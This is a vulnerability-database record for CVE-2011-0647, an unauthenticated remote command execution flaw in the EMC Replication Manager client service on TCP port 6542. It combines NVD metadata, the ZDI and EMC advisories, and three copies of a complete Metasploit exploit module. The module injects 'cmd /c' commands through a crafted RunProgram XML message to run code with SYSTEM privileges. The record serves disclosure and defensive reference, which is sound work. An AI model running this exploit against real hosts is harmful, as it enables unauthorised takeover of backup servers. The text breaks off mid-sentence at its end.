{"id": "SECURITYVULNS:VULN:11428", "bulletinFamily": "software", "title": "EMC Replication Manager code execution", "description": "Command execution via TCP/6542 service.", "published": "2011-03-31T00:00:00", "modified": "2011-03-31T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11428", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:25708", "https://vulners.com/securityvulns/securityvulns:doc:26042", "https://vulners.com/securityvulns/securityvulns:doc:25709"], "cvelist": ["CVE-2011-0647"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:40", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2018-08-31T11:09:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-0647"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25709", "SECURITYVULNS:DOC:25708", "SECURITYVULNS:DOC:26042"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123730"]}, {"type": "zdt", "idList": ["1337DAY-ID-21407"]}, {"type": "zdi", "idList": ["ZDI-11-061"]}, {"type": "exploitdb", "idList": ["EDB-ID:41703", "EDB-ID:41704"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/EMC/REPLICATION_MANAGER_EXEC"]}], "modified": "2018-08-31T11:09:40", "rev": 2}, "vulnersScore": 6.5}, "affectedSoftware": [{"name": "EMC NetWorker Module for Microsoft Applications", "operator": "eq", "version": "2.3"}, {"name": "EMC Replication Manager", "operator": "eq", "version": "5.2"}]}

{"cve": [{"lastseen": "2020-12-09T19:39:04", "description": "The irccd.exe service in EMC Replication Manager Client before 5.3 and NetWorker Module for Microsoft Applications 2.1.x and 2.2.x allows remote attackers to execute arbitrary commands via the RunProgram function to TCP port 6542.", "edition": 5, "cvss3": {}, "published": "2011-02-10T18:00:00", "title": "CVE-2011-0647", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0647"], "modified": "2018-10-09T19:29:00", "cpe": ["cpe:/a:emc:replication_manager:5.2", "cpe:/a:emc:networker_module:2.1", "cpe:/a:emc:networker_module:2.2", "cpe:/a:emc:replication_manager:2.0", "cpe:/a:emc:replication_manager:5.2.2", "cpe:/a:emc:replication_manager:5.2.3"], "id": "CVE-2011-0647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0647", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:replication_manager:5.2.2:*:client:*:*:*:*:*", "cpe:2.3:a:emc:replication_manager:5.2:*:client:*:*:*:*:*", "cpe:2.3:a:emc:networker_module:2.1:-:microsoft_applications:*:*:*:*:*", "cpe:2.3:a:emc:replication_manager:2.0:*:client:*:*:*:*:*", "cpe:2.3:a:emc:replication_manager:5.2.3:*:client:*:*:*:*:*", "cpe:2.3:a:emc:networker_module:2.2:-:microsoft_applications:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-09T19:45:30", "edition": 2, "description": "This Metasploit module exploits a remote command-injection vulnerability in EMC Replication Manager client (irccd.exe). By sending a specially crafted message invoking RunProgram function an attacker may be able to execute arbitrary code commands with SYSTEM privileges. Affected products are EMC Replication Manager < 5.3. This Metasploit module has been successfully tested against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested against these products.", "published": "2013-10-23T00:00:00", "type": "zdt", "title": "EMC Replication Manager Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0647"], "modified": "2013-10-23T00:00:00", "id": "1337DAY-ID-21407", "href": "https://0day.today/exploit/description/21407", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::CmdStagerVBS\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'EMC Replication Manager Command Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command-injection vulnerability in EMC Replication Manager\r\n client (irccd.exe). By sending a specially crafted message invoking RunProgram function an\r\n attacker may be able to execute arbitrary code commands with SYSTEM privileges. Affected\r\n products are EMC Replication Manager < 5.3. This module has been successfully tested\r\n against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft\r\n Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested\r\n against these products.\r\n },\r\n 'Author' =>\r\n [\r\n 'Unknown', #Initial discovery\r\n 'Davy Douhine' #MSF module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-0647' ],\r\n [ 'OSVDB', '70853' ],\r\n [ 'BID', '46235' ],\r\n [ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ]\r\n ],\r\n 'DisclosureDate' => 'Feb 07 2011',\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 4096,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n # Tested on Windows XP and Windows 2003\r\n [ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 5\r\n },\r\n 'DefaultTarget' => 0,\r\n 'Privileged' => true\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(6542)\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n execute_cmdstager({:linemax => 5000})\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n connect\r\n hello = \"1HELLOEMC00000000000000000000000\"\r\n vprint_status(\"Sending hello...\")\r\n sock.put(hello)\r\n result = sock.get_once || ''\r\n if result =~ /RAWHELLO/\r\n vprint_good(\"Expected hello response\")\r\n else\r\n disconnect\r\n fail_with(Failure::Unknown ,\"Failed to hello the server\")\r\n end\r\n\r\n start_session = \"EMC_Len0000000136<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><ir_message ir_sessionId=0000 ir_type=\\\"ClientStartSession\\\" <ir_version>1</ir_version></ir_message>\"\r\n vprint_status(\"Starting session...\")\r\n sock.put(start_session)\r\n result = sock.get_once || ''\r\n if result =~ /EMC/\r\n vprint_good(\"A session has been created. Good.\")\r\n else\r\n disconnect\r\n fail_with(Failure::Unknown, \"Failed to create the session\")\r\n end\r\n\r\n run_prog = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?> \"\r\n run_prog << \"<ir_message ir_sessionId=\\\"01111\\\" ir_requestId=\\\"00000\\\" ir_type=\\\"RunProgram\\\" ir_status=\\\"0\\\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>\"\r\n run_prog << \"<ir_runProgramAppInfo><?xml version=\"1.0\" encoding=\"UTF-8\"?> <ir_message ir_sessionId=\"00000\" ir_requestId=\"00000\" \"\r\n run_prog << \"ir_type=\"App Info\" ir_status=\"0\"><IR_groupEntry IR_groupType=\"anywriter\" IR_groupName=\"CM1109A1\" IR_groupId=\"1\" \"\r\n run_prog << \"><?xml version=\"1.0\" encoding=\"UTF-8\"? > <ir_message ir_sessionId=\"00000\" \"\r\n run_prog << \"ir_requestId=\"00000\"ir_type=\"App Info\" ir_status=\"0\"><aa_anywriter_ccr_node>CM1109A1\"\r\n run_prog << \"</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0\"\r\n run_prog << \"</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1\"\r\n run_prog << \"</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>\"\r\n run_prog << \"</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1\"\r\n run_prog << \"</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0\"\r\n run_prog << \"</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&amp\"\r\n run_prog << \";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path\"\r\n run_prog << \"></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300\"\r\n run_prog << \"</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>\"\r\n run_prog << \"</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339\"\r\n run_prog << \"</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message></ir_runProgramAppInfo>\"\r\n run_prog << \"<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>\"\r\n run_prog_header = \"EMC_Len000000\"\r\n run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog\r\n\r\n vprint_status(\"Executing command....\")\r\n sock.put(run_prog_packet)\r\n sock.get_once(-1, 1)\r\n\r\n end_string = Rex::Text.rand_text_alpha(rand(10)+32)\r\n sock.put(end_string)\r\n sock.get_once(-1, 1)\r\n disconnect\r\n\r\n end\r\nend\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21407"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:05", "description": "", "published": "2013-10-23T00:00:00", "type": "packetstorm", "title": "EMC Replication Manager Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0647"], "modified": "2013-10-23T00:00:00", "id": "PACKETSTORM:123730", "href": "https://packetstormsecurity.com/files/123730/EMC-Replication-Manager-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::CmdStagerVBS \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'EMC Replication Manager Command Execution', \n'Description' => %q{ \nThis module exploits a remote command-injection vulnerability in EMC Replication Manager \nclient (irccd.exe). By sending a specially crafted message invoking RunProgram function an \nattacker may be able to execute arbitrary code commands with SYSTEM privileges. Affected \nproducts are EMC Replication Manager < 5.3. This module has been successfully tested \nagainst EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft \nApplications 2.1 and 2.2 may be vulnerable too although this module have not been tested \nagainst these products. \n}, \n'Author' => \n[ \n'Unknown', #Initial discovery \n'Davy Douhine' #MSF module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2011-0647' ], \n[ 'OSVDB', '70853' ], \n[ 'BID', '46235' ], \n[ 'URL', 'http://www.securityfocus.com/archive/1/516260' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ] \n], \n'DisclosureDate' => 'Feb 07 2011', \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n'Payload' => \n{ \n'Space' => 4096, \n'DisableNops' => true \n}, \n'Targets' => \n[ \n# Tested on Windows XP and Windows 2003 \n[ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ] \n], \n'DefaultOptions' => \n{ \n'WfsDelay' => 5 \n}, \n'DefaultTarget' => 0, \n'Privileged' => true \n)) \n \nregister_options( \n[ \nOpt::RPORT(6542) \n], self.class) \nend \n \ndef exploit \nexecute_cmdstager({:linemax => 5000}) \nend \n \ndef execute_command(cmd, opts) \nconnect \nhello = \"1HELLOEMC00000000000000000000000\" \nvprint_status(\"Sending hello...\") \nsock.put(hello) \nresult = sock.get_once || '' \nif result =~ /RAWHELLO/ \nvprint_good(\"Expected hello response\") \nelse \ndisconnect \nfail_with(Failure::Unknown ,\"Failed to hello the server\") \nend \n \nstart_session = \"EMC_Len0000000136<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><ir_message ir_sessionId=0000 ir_type=\\\"ClientStartSession\\\" <ir_version>1</ir_version></ir_message>\" \nvprint_status(\"Starting session...\") \nsock.put(start_session) \nresult = sock.get_once || '' \nif result =~ /EMC/ \nvprint_good(\"A session has been created. Good.\") \nelse \ndisconnect \nfail_with(Failure::Unknown, \"Failed to create the session\") \nend \n \nrun_prog = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?> \" \nrun_prog << \"<ir_message ir_sessionId=\\\"01111\\\" ir_requestId=\\\"00000\\\" ir_type=\\\"RunProgram\\\" ir_status=\\\"0\\\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>\" \nrun_prog << \"<ir_runProgramAppInfo><?xml version=\"1.0\" encoding=\"UTF-8\"?> <ir_message ir_sessionId=\"00000\" ir_requestId=\"00000\" \" \nrun_prog << \"ir_type=\"App Info\" ir_status=\"0\"><IR_groupEntry IR_groupType=\"anywriter\" IR_groupName=\"CM1109A1\" IR_groupId=\"1\" \" \nrun_prog << \"><?xml version=\"1.0\" encoding=\"UTF-8\"? > <ir_message ir_sessionId=\"00000\" \" \nrun_prog << \"ir_requestId=\"00000\"ir_type=\"App Info\" ir_status=\"0\"><aa_anywriter_ccr_node>CM1109A1\" \nrun_prog << \"</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0\" \nrun_prog << \"</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1\" \nrun_prog << \"</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>\" \nrun_prog << \"</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1\" \nrun_prog << \"</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0\" \nrun_prog << \"</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&amp\" \nrun_prog << \";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path\" \nrun_prog << \"></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300\" \nrun_prog << \"</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>\" \nrun_prog << \"</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339\" \nrun_prog << \"</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message></ir_runProgramAppInfo>\" \nrun_prog << \"<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>\" \nrun_prog_header = \"EMC_Len000000\" \nrun_prog_packet = run_prog_header + run_prog.length.to_s + run_prog \n \nvprint_status(\"Executing command....\") \nsock.put(run_prog_packet) \nsock.get_once(-1, 1) \n \nend_string = Rex::Text.rand_text_alpha(rand(10)+32) \nsock.put(end_string) \nsock.get_once(-1, 1) \ndisconnect \n \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123730/replication_manager_exec.rb.txt"}], "exploitdb": [{"lastseen": "2017-03-23T13:17:09", "description": "EMC Replication Manager < 5.3 - Command Execution (Metasploit). CVE-2011-0647. Local exploit for Windows platform", "published": "2017-03-23T00:00:00", "type": "exploitdb", "title": "EMC Replication Manager < 5.3 - Command Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0647"], "modified": "2017-03-23T00:00:00", "id": "EDB-ID:41704", "href": "https://www.exploit-db.com/exploits/41704/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'EMC Replication Manager Command Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command-injection vulnerability in EMC Replication Manager\r\n client (irccd.exe). By sending a specially crafted message invoking RunProgram function an\r\n attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected\r\n products are EMC Replication Manager < 5.3. This module has been successfully tested\r\n against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft\r\n Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested\r\n against these products.\r\n },\r\n 'Author' =>\r\n [\r\n 'Unknown', #Initial discovery\r\n 'Davy Douhine' #MSF module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-0647' ],\r\n [ 'OSVDB', '70853' ],\r\n [ 'BID', '46235' ],\r\n [ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],\r\n [ 'ZDI', '11-061' ]\r\n ],\r\n 'DisclosureDate' => 'Feb 07 2011',\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 4096,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n # Tested on Windows XP and Windows 2003\r\n [ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ]\r\n ],\r\n 'CmdStagerFlavor' => 'vbs',\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 5\r\n },\r\n 'DefaultTarget' => 0,\r\n 'Privileged' => true\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(6542)\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n execute_cmdstager({:linemax => 5000})\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n connect\r\n hello = \"1HELLOEMC00000000000000000000000\"\r\n vprint_status(\"Sending hello...\")\r\n sock.put(hello)\r\n result = sock.get_once || ''\r\n if result =~ /RAWHELLO/\r\n vprint_good(\"Expected hello response\")\r\n else\r\n disconnect\r\n fail_with(Failure::Unknown, \"Failed to hello the server\")\r\n end\r\n\r\n start_session = \"EMC_Len0000000136<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><ir_message ir_sessionId=0000 ir_type=\\\"ClientStartSession\\\" <ir_version>1</ir_version></ir_message>\"\r\n vprint_status(\"Starting session...\")\r\n sock.put(start_session)\r\n result = sock.get_once || ''\r\n if result =~ /EMC/\r\n vprint_good(\"A session has been created. Good.\")\r\n else\r\n disconnect\r\n fail_with(Failure::Unknown, \"Failed to create the session\")\r\n end\r\n\r\n run_prog = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?> \"\r\n run_prog << \"<ir_message ir_sessionId=\\\"01111\\\" ir_requestId=\\\"00000\\\" ir_type=\\\"RunProgram\\\" ir_status=\\\"0\\\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>\"\r\n run_prog << \"<ir_runProgramAppInfo><?xml version=\"1.0\" encoding=\"UTF-8\"?> <ir_message ir_sessionId=\"00000\" ir_requestId=\"00000\" \"\r\n run_prog << \"ir_type=\"App Info\" ir_status=\"0\"><IR_groupEntry IR_groupType=\"anywriter\" IR_groupName=\"CM1109A1\" IR_groupId=\"1\" \"\r\n run_prog << \"><?xml version=\"1.0\" encoding=\"UTF-8\"?\t> <ir_message ir_sessionId=\"00000\" \"\r\n run_prog << \"ir_requestId=\"00000\"ir_type=\"App Info\" ir_status=\"0\"><aa_anywriter_ccr_node>CM1109A1\"\r\n run_prog << \"</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0\"\r\n run_prog << \"</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1\"\r\n run_prog << \"</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>\"\r\n run_prog << \"</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1\"\r\n run_prog << \"</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0\"\r\n run_prog << \"</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&amp\"\r\n run_prog << \";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path\"\r\n run_prog << \"></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300\"\r\n run_prog << \"</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>\"\r\n run_prog << \"</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339\"\r\n run_prog << \"</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message></ir_runProgramAppInfo>\"\r\n run_prog << \"<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>\"\r\n run_prog_header = \"EMC_Len000000\"\r\n run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog\r\n\r\n vprint_status(\"Executing command....\")\r\n sock.put(run_prog_packet)\r\n sock.get_once(-1, 1)\r\n\r\n end_string = Rex::Text.rand_text_alpha(rand(10)+32)\r\n sock.put(end_string)\r\n sock.get_once(-1, 1)\r\n disconnect\r\n\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41704/"}, {"lastseen": "2017-03-23T13:17:08", "description": "EMC Replication Manager < 5.3 - Command Execution (Metasploit). CVE-2011-0647. Local exploit for Windows platform", "published": "2017-03-23T00:00:00", "type": "exploitdb", "title": "EMC Replication Manager < 5.3 - Command Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0647"], "modified": "2017-03-23T00:00:00", "id": "EDB-ID:41703", "href": "https://www.exploit-db.com/exploits/41703/", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41703/"}], "zdi": [{"lastseen": "2020-06-22T11:41:09", "bulletinFamily": "info", "cvelist": ["CVE-2011-0647"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the EMC Replication Manager Client. Authentication is not required to exploit this vulnerability. The Replication Manager client installs a service binds the irccd.exe process to TCP port 6542. This service accepts commands using an XML-based protocol. It exposes a vulnerability through it's RunProgram functionality. By abusing this function an attacker can execute arbitrary code under the context of currently logged in user.", "modified": "2011-06-22T00:00:00", "published": "2011-02-07T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-11-061/", "id": "ZDI-11-061", "title": "(0Day) EMC Replication Manager Client irccd.exe Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-0647"], "description": "ZDI-11-061: EMC Replication Manager Client irccd.exe Remote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-061\r\n\r\nFebruary 7, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-0647\r\n\r\n-- CVSS:\r\n10, &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41;\r\n\r\n-- Affected Vendors:\r\nEMC\r\n\r\n-- Affected Products:\r\nEMC Replication Manager\r\n\r\n-- TippingPoint&#40;TM&#41; IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 8028. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of the EMC Replication Manager Client.\r\nAuthentication is not required to exploit this vulnerability.\r\n\r\nThe Replication Manager client installs a service binds the irccd.exe\r\nprocess to TCP port 6542. This service accepts commands using an\r\nXML-based protocol. It exposes a vulnerability through it&#39;s RunProgram\r\nfunctionality. By abusing this function an attacker can execute\r\narbitrary code under the context of currently logged in user.\r\n\r\n-- Vendor Response:\r\nEMC has stated that this vulnerability has been fixed in EMC Replication\r\nManager version 5.3 available through EMC Powerlink. However, the bug is\r\nstill present in the EMC Networker Module for Microsoft Applications. It\r\nwill be fixed in these products at a later date. EMC has released\r\nSecurity Advisory ESA-2011-004 to address this issue &#40;covering\r\nCVE-2011-0647&#41;.\r\n\r\n-- Disclosure Timeline:\r\n2009-10-27 - Vulnerability reported to vendor\r\n2011-02-07 - Public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative &#40;ZDI&#41;:\r\nEstablished by TippingPoint, The Zero Day Initiative &#40;ZDI&#41; represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors &#40;including competitors&#41; who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2011-02-14T00:00:00", "published": "2011-02-14T00:00:00", "id": "SECURITYVULNS:DOC:25709", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25709", "title": "ZDI-11-061: EMC Replication Manager Client irccd.exe Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-0647"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2011-012: Security update for EMC NetWorker Module for Microsoft Applications.\r\n\r\nEMC Identifier: ESA-2011-012\r\n\r\nCVE Identifier: CVE-2011-0647\r\n\r\nSeverity Rating: CVSS v2 Base Score: 9.3 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41;\r\n\r\nAffected products:\r\n\r\nEMC NetWorker Module for Microsoft Applications 2.1.x\r\nEMC NetWorker Module for Microsoft Applications 2.2.x\r\n\r\nVulnerability Summary: \r\n \r\nA vulnerability exists in EMC Replication Manager which is embedded in NetWorker Module for Microsoft Applications &#40;NMM&#41;. The\r\nvulnerability may allow arbitrary code execution on vulnerable installations of the product. \r\n\r\nVulnerability Details: \r\n \r\nEMC Replication Manager contains a potential vulnerability that may allow remote unauthenticated user to execute arbitrary code on\r\nvulnerable installations of EMC Replication Manager &#40;Refer to EMC Knowledgebase solution emc260506 for details on ESA-2011-004&#41;. Because\r\nNetWorker Module for Microsoft Applications embeds Replication Manager code, NMM users were also determined to be vulnerable. \r\n\r\nProblem Resolution: \r\n \r\nThe following EMC products contain resolutions to this issue: \r\n \r\nEMC NetWorker Module for Microsoft Applications 2.3\r\n\r\nRefer to EMC Knowledgebase solution emc260506 for details on fixes for EMC Replication Manager related to ESA-2011-004. \r\n\r\nEMC strongly recommends that all customers upgrade to latest version of the products, which contain the resolution to this issue, at the\r\nearliest opportunity. \r\n\r\nLink to 